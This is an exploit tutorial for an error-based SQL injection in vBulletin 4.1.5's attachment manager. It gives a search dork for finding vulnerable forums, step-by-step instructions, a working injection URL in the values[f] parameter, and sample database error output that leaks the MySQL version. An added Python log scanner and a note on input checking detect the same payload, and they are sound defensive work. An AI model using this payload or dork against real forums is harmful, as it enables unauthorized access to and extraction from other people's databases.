Exploit vBulletin 4.1.5


vBulletin 4.1.5 attachment SQLi

While examining variables I came across an SQL injection, which later turned out to be inherent to all vBulletin 4.1.5 installations.

Title: Vulnerability in vBulletin 4.1.5
Dork: Powered by Powered by vBulletin 4.1.5
Conditions: An account on the forum. Permission to attach files to messages / topics (attachments).

Register -> go to the forum -> click a topic or, if the board has it, choose to create an article (the second option is more work) -> at the bottom look for Attachments, 'Manage Attachments' -> open the window and in the "values[f]" parameter insert our SQL query.
Example:

Code:
http://site.com/board/newattachment....manager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1
After that we see the standard database error page. Open the source code of the page and you will see:


Code:
<!--
Database error in vBulletin 4.1.5:

Invalid SQL:

SELECT permissionsfrom, hidden, setpublish, publishdate, userid
FROM ds23fSDdfsdf_cms_node
WHERE nodeid = -1599 or(1,2)=(select*from(select name_const(version(),1),name_const(version(),1))a);

MySQL Error   : Duplicate column name '5.1.49-3'
Error Number  : 1060
Request Date  : Tuesday, February 12th 2013 @ 01:12:33 PM
Error Date    : Tuesday, February 12th 2013 @ 01:12:33

Address       : 127.0.0.1
Username      : Hacker
Classname     : vB_Database
MySQL Version :
-->
Tut by VHB
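
Added example, not part of the original tutorial: a log check a defender can run for the request shown above. The error output shows values[f] landing unquoted in `WHERE nodeid = ...`, so any value that is not a plain integer is worth flagging; the path `SCRIPT` and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Request field of a combined-format access log line: "METHOD URI PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"-?\d+")  # a node id is an optional sign plus digits
SQL_HINT_RE = re.compile(r"\b(select|union|name_const)\b", re.I)

def check_line(line):
    """Classify the values[f] parameter of one log line.

    Returns ("ok" | "non-integer" | "sqli", decoded_value),
    or None when the request carries no values[f] parameter.
    """
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    # parse_qsl decodes %5B/%5D and '+', so encoded variants are caught too
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key == "values[f]":
            if INT_RE.fullmatch(value.strip()):
                return ("ok", value)
            kind = "sqli" if SQL_HINT_RE.search(value) else "non-integer"
            return (kind, value)
    return None

def scan(lines):
    """Return [(line_number, verdict, value)] for every suspicious line."""
    findings = []
    for n, line in enumerate(lines, 1):
        result = check_line(line)
        if result and result[0] != "ok":
            findings.append((n, result[0], result[1]))
    return findings

# Constructed sample log; SCRIPT stands in for the attachment-manager path.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Feb/2013:13:12:30 +0000] "GET /board/SCRIPT?values[f]=12&contenttypeid=18 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [12/Feb/2013:13:12:33 +0000] "GET /board/SCRIPT?values%5Bf%5D=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18 HTTP/1.1" 200 2048',
    '198.51.100.4 - - [12/Feb/2013:13:15:02 +0000] "GET /board/SCRIPT?values[f]=12abc HTTP/1.1" 200 300',
    '198.51.100.4 - - [12/Feb/2013:13:15:09 +0000] "GET /board/index.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for n, verdict, value in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}: {value!r}")
```

POST bodies do not appear in access logs, so this covers only the query-string form shown in the tutorial. The same integer test applied to values[f] on the server side, before the value reaches the query, is the corresponding input check.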
